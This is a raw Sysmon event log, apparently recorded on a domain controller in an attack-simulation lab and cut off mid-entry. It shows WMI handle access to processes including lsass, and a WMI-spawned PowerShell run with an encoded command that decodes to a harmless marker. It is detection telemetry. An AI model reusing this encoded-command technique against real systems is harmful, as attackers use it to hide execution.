16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6DD3-603E-E3AA-00000000AD01}358010516C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA47744EA26A2E663401718D97C4FEB1,SHA256=5CE96952D85E72F65E1E842A4DE90B6B3699F628446F074E36C2C55FE47809F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002243316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u1dvc3km.2mg.ps12021-03-02 16:54:43.675 10341000x80000000000000002243315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E3AA-00000000AD01}3580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.675{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.674{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.674{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.674{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002243305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.673{05ADC7E1-6DD3-603E-E2AA-00000000AD01}8200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgADYAMQBlAGEAYwA0ADAANgAtADIAYgBlADkALQA0ADIAMQAwAC0AOQBiADkAYwAtADgAYQBlAGIANwA1AGUAYQBkADYAMABjAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002243304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.654{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D571931600E9157903982686B0F13F0,SHA256=ABEB900D7F7E3CD463AF31871FE5E6E1E10FF3D84860D8D4242D1D75E10753BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E1AA-00000000AD01}9004C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C